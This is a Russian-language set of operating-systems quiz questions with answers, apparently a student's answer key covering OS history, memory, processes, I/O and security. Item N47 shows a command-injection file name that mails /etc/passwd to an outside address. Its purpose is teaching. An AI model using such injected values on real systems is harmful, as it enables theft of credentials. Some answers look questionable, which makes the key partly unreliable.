ТЕСТЫ_ОС
.docxВопрос 1. Первые системные программы (компиляторы) появились: одновременно с полупроводниковыми элементами в 50 годах
Вопрос 2. Автоматизировать запуск одной программы за другой и тем самым увеличить коэффициент загрузки процессора позволило: появление систем пакетной обработки
Вопрос 3. Важнейшим достижением ОС серии машин IBM/360 является: -мультипрограммирование
Вопрос 4. Аутентификация - это a) проверка того, что пользователь является тем, за кого он себя выдает
Вопрос 5. Основным достоинством микроядерной архитектуры является: c) высокая степень модульности ядра операционной системы
Вопрос 6. Экзоядро не выполняет следующую задачу: d) распределения ресурсов при помощи сложных алгоритмов
Вопрос 7. Загрузка операционной системы на IBM-совместимом компьютере начинается с: d) считывания BIOSом первых 512 байт накопителя
Вопрос 8. Для пересборки ядра необходимо: b) исходные тексты или объектные модули ядра
Вопрос 9. Чем определяется адрес команды в реальном режиме: b) значениями регистров CS и IP
Вопрос 10. Чем определяется адрес вершины стека в реальном режиме: c) значениями регистров SS и SP
Вопрос 11. Как изменятся значения регистров при выполнении команды PUSH AX: b) значения регистра SP уменьшится на 2
Вопрос 12. Как изменятся значения регистров при выполнении команды POP AX: c) значения регистра SP увеличится на 2
Вопрос 13. Динамические библиотеки (DLL) подключаются к программе: a) в процессе выполнения программы
Вопрос 14. К операционным системам не относится: a) Norton Comander
Вопрос 15. Какая из ОС не позволяет организовать использование компьютера в многозадачном режиме a) MS DOS
Вопрос 16. Операционная система – это b) система программ, осуществляющая управление работой компьютера
Вопрос 17. Что называют ядром ОС: a) часть важных программных модулей, которые должны постоянно находиться в оперативной памяти для более эффективной организации вычислительного процесса
Вопрос 18. Что такое Транзитные программные модули операционной системы: b) модули, которые загружаются в оперативную память только при необходимости
Вопрос 19. Что такое виртуальная память:c) совокупность программно-аппаратных средств, позволяющих писать программы, требующие больше памяти, чем реально существующее ОЗУ в компьютере
Вопрос 20. Что происходит, если объем требуемой виртуальной памяти превосходит объем реально существующего ОЗУ в компьютере b) программа пользуется информацией из файла подкачки с диска
Вопрос 21. Что такое кэш-память a) более быстродействующая память меньшего объема, чем ОЗУ
Вопрос 22. Драйвер устройства – это c) программа, управляющая работой устройства ввода-вывода
Вопрос 23. Какие устройства ввода-вывода имеют прямой доступ к памяти (DMA) b) диски
Вопрос 24. Что такое файл
a) файл – это совокупность данных, доступ к которым осуществляется по имени файла
Вопрос 25. Сколько разделов может быть создано на диске с помощью программы FDISK ЧЕТЫРЕ
Операционные системы - 2.
Тест по информатике и информационным технологиям
-
В состав ОС не входит ... драйверы
-
Стандартный интерфейс ОС Windows не имеет ... строки ввода команды
-
Технология Plug and Play ... позволяет новым устройствам автоматически настраиваться под конфигурацию данного компьютера
-
Ярлык – это ... графическое изображение файла, папки или программы
-
ОС Windows предоставляет возможность работать с мультимедиа информацией. К таким программам не относится ... Scan Disk (Диагностика)
-
Жесткому диску соответствует имя ... С:
-
К функциональным возможностям ОС Windows не относится ... поддержка имен файлов только формата 8.3
-
Текущий каталог – это каталог ...с которым работает или работал пользователь на данном диске
-
При удалении файлов активизируется Корзина. Что происходит с удаляемыми файлами? Файлы не удаляются с диска, они хранятся в папке Корзина, но в папке, где они находились, их уже нет.
-
DOS предназначена для ... организации управления компьютером и его ресурсами через набор элементарных операций
Операционные системы - 1.
Тест по информатике и информационным технологиям
-
Какие функции выполняет операционная система? организация диалога с пользователем, управления аппаратурой и ресурсами компьютера
-
де находится BIOS? в постоянно-запоминающем устройстве (ПЗУ)
-
Папка, в которую временно попадают удаленные объекты, называется ...Корзина
-
Текущий диск – это ... диск, с которым пользователь работает в данный момент времени
-
ОС Windows поддерживает длинные имена файлов. Длинным именем файла считается ... любое имя файла, не превышающее 255 символов
-
Внутренние команды – это ... команды, встроенные в операционную систему
-
Функции, выполняемые программой command.com ... обрабатывает команды, вводимые пользователем
-
Загрузчик операционной системы служит для ... считывания в память модулей операционной системы io.sys и msdos.sys
-
Какие команды DOS называются внешними? команды, хранящиеся на диске и вызываемые по мере необходимости
-
BIOS – это ... базовая система ввода-вывода
ЕЩЕ ТЕСТ
N 1 Для сетевых операционных систем характерной является функция обеспечения … взаимодействия связанных между собой компьютеров
N 2 Одна операционная система может поддерживать несколько … операционных сред
N 3 Термин "маскирование" означает запрет отдельных … сигналов прерывания
N 4 Для реализации синхронизации на уровне языка программирования используются высокоуровневые примитивы, названные … мониторами
N 5 Относительный путь к файлу состоит из списка каталогов, которые нужно … пройти от рабочего каталога, чтобы добраться до файла
N 6 Свопингом сегментов называется перемещение … сегментов между оперативной и внешней памятью
N 7 Идентификатор пользователя представляет собой уникальное целое значение
N 8 Мультитерминальный режим работы предполагает совмещение … диалогового режима работы и режима мультипрограммирования
N 9 Последовательная трансляция двух исходных программ является … двумя разными процессами
N 10 Идентификатор процесса является частью Дескриптора и Описателя процесса.
N 11 В OS UNIX каждый новый процесс может быть образован (порожден) только … одним из существующих процессов
N 12 Основное различие между долгосрочным и краткосрочным планированием (диспетчеризацией) заключается в … частоте выполнения
N 13 Приоритет, меняющейся во время исполнения процесса, называется Динамическим приоритетом.
N 14 При совместном использовании процессами аппаратных и информационных ресурсов вычислительной системы возникает потребность в … Синхронизации
N 15 В операционной системе UNIX сигналы можно рассматривать как простейшую форму взаимодействия между … процессами
N 16 Область эффективного применения событийного программирования начинается там, где возникают …трудности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы; неудобство использования графа переходов между состояниями
N 17 Два параллельных процесса могут быть … независимыми
N 18 Главной целью мультипрограммирования в системах пакетной обработки является … минимизация простоев всех устройств компьютера
N 19 Учет участков свободной памяти с помощью связного списка свободных/занятых блоков позволяет … выделять участки памяти произвольных размеров
N 20 Использование виртуальной памяти в однопрограммном режиме приводит к … процесса, если размер программы существенно больше объема доступной оперативной памяти замедлению выполнения
N 21 Виртуальная память позволяет … загружать программы, размер которых превышает объем доступной физической памяти; загружать множество небольших программ, суммарный объем которых больше объема физической памяти
N 22 Сегментная организация памяти … отдельно скомпилированных процедур. упрощает компоновку
N 23 При страничной организации памяти таблица страниц может размещаться в … В специальной быстрой памяти процессора и в оперативной памяти
N 24 Страничная организация предназначена для … получения большого адресного пространства без приобретения дополнительной физической памяти
N 25 При страничном сбое и отсутствии свободных блоков физической памяти операционная система должна … выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске, если она претерпела изменения
N 26 Полная реализация алгоритма LRU (Least Recently Used) … практически невозможна
N 27 Запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы получает _____________ ввода-вывода. супервизор
N 28 Мыши (в качестве устройства-указателя) относятся к _____________ устройствам ввода-вывода. символьным
N 29 Любые операции по управлению вводом-выводом объявляются … привилегированными
N 30 Супервизор ввода-вывода инициирует операции ввода-вывода и в случае управления вводом-выводом с использованием прерываний предоставляет процессор … диспетчеру задач
N 31 В режиме обмена с опросом готовности устройства ввода-вывода используется _____________ центрального процессора. нерационально время
N 32 Понятия «виртуального устройства» по отношению к понятию «спулинга» … является более широким!!
N 33 Каждый элемент таблицы оборудования условно называется … UCB!!!
N 34 Для увеличения скорости выполнения приложений при необходимости предлагается использовать _____________ ввод-вывод. асинхронный
N 35 Программа, расположенная в главной загрузочной записи, называется _____________ загрузчиком. Внесистемным
N 36 Простейшим вариантом ускорения дисковых операций чтения данных можно считать использование двойной … буферизации
N 37 Операционная система реального времени должна обеспечивать … наследование приоритетов
N 38 К невыгружаемым относятся такие ресурсы, которые не могут быть … отобраны у процесса
N 39 Интерфейс прикладного программирования предназначен для использования прикладными программами … системных ресурсов компьютера
N 40 По режиму обработки задач различают операционные системы, обеспечивающие _________ режим мультипрограммный; однопрограммный
N 41 Угроза зомби реализуется с помощью … и заставляет компьютер выполнять приказания других лиц. вредоносных программ
N 42 Недостаток систем шифрования с секретным ключом состоит в том, что … отправитель и получатель должны иметь общий секретный ключ
N 43 Объектами защиты в компьютерных системах могут быть … программы
N 44 Политика принудительного управления доступом (mandatory access control) возлагает полномочия по назначению прав доступа к файлам и другим объектам на ... руководителей подразделений
N 45 Защита зашифрованных паролей в UNIX взламывается путем … шифрования множества потенциальных паролей открытым алгоритмом шифрования и поиска совпадений в файле паролей
N 46 Лазейки в программах создаются … для облегчения отладки программ или в противоправных целях
N 47 Программа, выполняющая копирование файла путем системного вызова, запрашивает у пользователя имена файла-источника и файла-приемника. Злоумышленник ввел в качестве имен файлов следующие значения: “aaa” и “bbb; mail goofinator@mail.ru </etc/passwd”. Какие действия выполнит система? Скопирует файл aaa в bbb и отправит по электронной почте файл паролей адресату goofinator@mail.ru.
N 48 Наиболее популярное применение ботнетов (сети зараженных компьютеров) - это … рассылка коммерческого спама
N 49 Перезаписывающий вирус заражает исполняемую программу путем … записи вируса на место кода программы!!!
N 50 Обнаружить зашифрованный вирус можно ... по сигнатурам кода процедур расшифровки вируса!!!